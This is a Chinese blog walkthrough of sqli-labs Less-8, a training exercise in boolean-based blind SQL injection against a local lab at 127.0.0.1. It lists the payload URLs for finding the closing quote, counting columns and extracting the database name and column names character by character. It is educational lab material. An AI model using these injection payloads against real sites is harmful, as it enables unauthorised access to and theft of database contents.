SQL注入漏洞

最新推荐文章于 2024-07-11 10:45:01 发布
最新推荐文章于 2024-07-11 10:45:01 发布
阅读量39 收藏
点赞数
文章标签: 安全 Powered by 金山文档
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_71326960/article/details/129115469
版权

sqli-labs关卡

第八关——布尔型盲注

根据第八关的题目来看,我们知道是一道布尔型盲注的题,首先来判断闭合字符

http://127.0.0.1/sqli/Less-8/?id=1’——加个单引号没有回显

http://127.0.0.1/sqli/Less-8/?id=1’)--+——页面显示异常,没有回显

输入http://127.0.0.1/sqli/Less-8/?id=1”--+ 页面显示正常

输入http://127.0.0.1/sqli/Less-8/?id=1”)--+页面显示正常

由此判断,我们的闭合字符很可能是“’”或者“’)”,接下来我们需要确定到底是哪一个闭合字符

http://127.0.0.1/sqli/Less-8/?id=1' and 1=1--+ ——真真为真,页面显示正常

http://127.0.0.1/sqli/Less-8/?id=1' and 1=2--+ ——一真一假,页面显示异常

由上即可说明这个闭合字符应该为单引号

接下来我们来判断列数

http://127.0.0.1/sqli/Less-8/?id=1' order by 3--+

http://127.0.0.1/sqli/Less-8/?id=1' order by 4--+

判断列数为3

接下来我们来判断一下当前数据库名的长度,从1开始逐渐增加,我这里只演示一部分

http://127.0.0.1/sqli/Less-8/?id=1' and length(database())>1--+

http://127.0.0.1/sqli/Less-8/?id=1' and length(database())>7--+

http://127.0.0.1/sqli/Less-8/?id=1' and length(database())>8--+

判断出当前数据库名的长度为8

再判断数据库名,对照ascii码表来一一判断,由之前的题目我们可以得知,当前的数据库名为security

判断字符s:

http://127.0.0.1/sqli/Less-8/?id=1' and ascii(substr(database(),1,1))=115--+

判断字符e

http://127.0.0.1/sqli/Less-8/?id=1' and ascii(substr(database(),2,1))=101--+

判断字符c

http://127.0.0.1/sqli/Less-8/?id=1' and ascii(substr(database(),3,1))=99--+

判断字符u

http://127.0.0.1/sqli/Less-8/?id=1' and ascii(substr(database(),4,1))=117--+

判断字符r

http://127.0.0.1/sqli/Less-8/?id=1' and ascii(substr(database(),5,1))=114--+

判断字符i

http://127.0.0.1/sqli/Less-8/?id=1' and ascii(substr(database(),6,1))=105--+

判断字符t

http://127.0.0.1/sqli/Less-8/?id=1' and ascii(substr(database(),7,1))=116--+

判断字符y

http://127.0.0.1/sqli/Less-8/?id=1' and ascii(substr(database(),8,1))=121--+

同样猜测users表中的列名,同猜测数据库名一样,先猜测表名的长度,再根据ASCII码表来改变后面的值和字符位置来猜测名字,这里不再演示了

http://127.0.0.1/sqli/Less-8/?id=1' and ascii(substr((select column_name from information_schema.columns where TABLE_name = 'emails' and table_schema = 'security' limit 0,1),1,1))=105--+

一只比巴卜
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
sql注入漏洞(CVE-2022-32991)
Battery的博客
09-10 8万+
CVE-2022-32991是Web Based Quiz System v1.0版本中存在的SQL注入漏洞,该漏洞源于welcome.php中的eid参数缺少对外部输入SQL语句的验证。攻击者可利用该漏洞执行非法SQL命令窃取数据库敏感数据。打开靶场环境,如下。
SQL注入漏洞全接触.ppt
11-15
"SQL注入漏洞全接触"知识点总结 一、 SQL注入漏洞的定义和原理 * SQL注入漏洞是指攻击者通过构造特殊的输入,来获取或修改服务器上的敏感数据。 * SQL注入漏洞的原理是从客户端提交特殊的代码,从而收集程序及...
sql注入漏洞
m0_69637056的博客
07-18 1643
sql
SQL注入漏洞检测
Kali与编程
12-10 1203
SQL注入漏洞是一种常见的安全漏洞,渗透测试工程师需要掌握SQL注入漏洞的检测技术,以便在测试中及时发现和利用漏洞。常见的注入点包括GET参数、POST参数、Cookie、HTTP头部信息和用户名密码等,常见的注入方式包括基于错误的注入、基于联合查询的注入、基于布尔盲注的注入、基于时间盲注的注入和基于报错盲注的注入等。本文将从渗透测试工程师的角度,详细介绍SQL注入漏洞的检测基础,包括常见的注入点、注入方式、手工注入和自动化注入等。常见的SQL注入技术包括基于错误的注入、基于时间的注入、联合查询注入等。
sql注入漏洞和实验
2303_81447649的博客
02-29 1156
发现不管输入什么都不管用了这个时候布尔盲注就不适合我们了,布尔盲注对于页面的正确和错误有不同的回显,如果页面一直没有变化我们就可以用时间盲注其实时间盲注和布尔盲注没有多大的差别,时间盲注多了if和sleep()函数。在将数据存入到了数据库中之后,开发者就认为数据是可信的,在下一次需要进行查询的时候,直接从数据库中取出了恶意数据,没有进行进一步的检验和处理,就会造成二次注入。SQL注入攻击的本质,服务器没有过滤用户输入的恶意数据,直接把用户输入的数据当做SQL语句执行,从而影响数据库安全和平台安全
通达OA sql注入漏洞.zip
08-24
然而,就像许多其他复杂的软件系统一样,它可能存在安全漏洞,其中之一就是SQL注入漏洞SQL注入是网络安全中的一个常见问题,允许攻击者通过在输入字段中插入恶意SQL代码来操纵数据库,获取敏感信息,甚至完全控制...
SQL注入漏洞演示源代码
09-29
SQL注入漏洞是网络安全领域中的一个重要话题,它涉及到数据库管理和Web应用程序的安全性。在这个"SQL注入漏洞演示源代码"中,我们可以深入理解这种攻击方式的工作原理,并学习如何防止它。 SQL注入是通过输入恶意的...
YXcms-含有SQL注入漏洞的源码包.zip
03-17
【标题】"YXcms-含有SQL注入漏洞的源码包.zip" 提供了一个关键的安全问题,即SQL注入漏洞,这是许多网站和应用程序面临的一种常见威胁。SQL注入是指攻击者通过在输入字段中插入恶意SQL代码,以获取、修改、删除...
自己动手编写SQL注入漏洞扫描工具
12-31
标题中的“自己动手编写SQL注入漏洞扫描工具”指的是创建一个能够自动检测Web应用程序是否存在SQL注入漏洞的软件。SQL注入是一种常见的网络安全威胁,攻击者通过在输入字段中插入恶意的SQL语句来操纵数据库,获取...
VPS拨号服务器:独享的高效与安全
qq_34245974的博客
07-06 685
本文将深入探讨VPS拨号服务器的独享特性,以及它如何提供更高效的服务和更强的安全保障。总之,VPS拨号服务器的独享特性为用户提供了一个高效、安全且灵活的网络环境,特别适合那些对服务器性能和安全性有高要求的业务需求。随着技术的不断进步,我们有理由相信,VPS拨号服务器将在未来的互联网架构中扮演越来越重要的角色。VPS拨号服务器是一种特殊的服务器,它结合了传统的VPS功能与动态IP地址分配能力。数据隔离:独享服务器保证了数据的隔离性,降低了数据泄露的风险。自定义安全策略:可以根据业务需求实施定制化的安全措施。
警钟!电池储能安全事故频发!物联网技术如何加强储能安全排查?
olzorange的博客
07-08 361
物联网技术的应用为储能安全排查提供了从源头预防到快速响应的全链条解决方案。
网络设备安全
weixin_48579910的博客
07-11 720
交换机作为网络核心设备,其安全性直接影响到整个网络的稳定和安全。通过实施身份验证和访问控制、设备配置安全、VLAN安全、ARP欺骗防护、MAC地址安全、DHCP欺骗防护、STP安全、拒绝服务防护以及固件和软件更新等措施,可以有效防范各种安全威胁。结合使用适当的安全工具和技术,组织可以大幅提高其交换机的安全防护能力,保护网络基础设施和数据的安全。定期进行安全审计和更新,确保交换机和网络始终处于最佳安全状态。确保路由器的安全是保护整个网络基础设施和数据传输安全的关键。
[终端安全]-5 移动终端之操作系统安全
wendywm0496的博客
07-08 979
每个应用程序运行在一个独立的进程中,通过操作系统的内存管理单元(MMU)实现自己独立的虚拟地址空间,通常从0开始到某个最大值(例如,32位系统上为4GB),这个空间是进程私有的,MMU负责将虚拟地址转换为物理地址。当操作系统在不同进程之间切换时,会切换当前的页表,通过改变MMU中存储的页表基地址(通常存储在寄存器中)来实现,这样进程A和进程B即使使用相同的虚拟地址,也会映射到不同的物理地址。当用户启动应用A时,操作系统会为其创建一个新的进程,该进程由应用A的UID 10001运行;
用XDR的思路保护API安全
AKAMAI_CHINA的博客
07-08 940
云计算飞速发展的今天,越来越多应用程序已经转为选择云原生架构,这就少不了Serverless、微服务、API等技术的协助。但同时也有越来越多的企业认识到,一定程度的“API安全”在整体安全与合规态势中发挥着至关重要的作用。然而,对很多企业来说,可能并不太明确API安全技术投资在其更广泛安全栈中的位置。
[图解]SysML和EA建模住宅安全系统-11-接口块
rolt的专栏
07-06 1028
当然内部块图里面肯定要比这个丰富
Foxit Reader:高效、安全、多功能的PDF阅读器技术解析
运维人生
07-10 398
由福建福昕软件开发股份有限公司开发,是一款轻量级、高效且功能丰富的PDF阅读器。它不仅拥有比同类产品更小的安装包体积和更快的打开速度,还全面支持最新的PDF文档属性,并提供了丰富的插件和自定义选项,极大地提升了用户体验。
如何通过文件分发系统,实现能源电力企业文件的安全分发流转?
文件数据安全交换
07-09 540
飞驰云联是中国领先的数据安全传输解决方案提供商,长期专注于安全可控、性能卓越的数据传输技术和解决方案,公司产品和方案覆盖了跨网跨区域的数据安全交换、供应链数据安全传输、数据传输过程的防泄漏、FTP的增强和国产化替代、文件传输自动化和传输集成等各种数据传输场景。大文件虚拟分块、海量文件虚拟拼接技术,保障大文件、海量文件的可靠传输;针对不同的⽂件类型(如业务数据、运维⽂件等)、分⽀机构、⼈员⻆⾊、及⽂件交换⽅向,可灵活配置不同的管控策略,进⽽控制⽂件流转的内容和范围,实现精细管控。
富格林:曝光纠正安全交易误区
最新发布
fgl100的博客
07-11 443
因此,贵金属并非完全无风险,投资者仍需注意市场风险。投资者应该理解贵金属市场的复杂性,并将其视为投资组合的一部分,而不是绝对安全的避险资产。同时,通过合理的资产配置和风险管理策略,可以降低贵金属投资的风险。尽管黄金是最受欢迎的贵金属之一,但其他贵金属,如白银、铂金和钯金,同样具有投资潜力。忽视了其他贵金属的投资机会会导致投资组合的单一化,增加了风险。投资者应该考虑将不同类型的贵金属组合在其投资组合中,以实现更好的风险分散和收益潜力。通过选择不同贵金属之间的相关性较低的品种,可以降低整体投资组合的风险。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值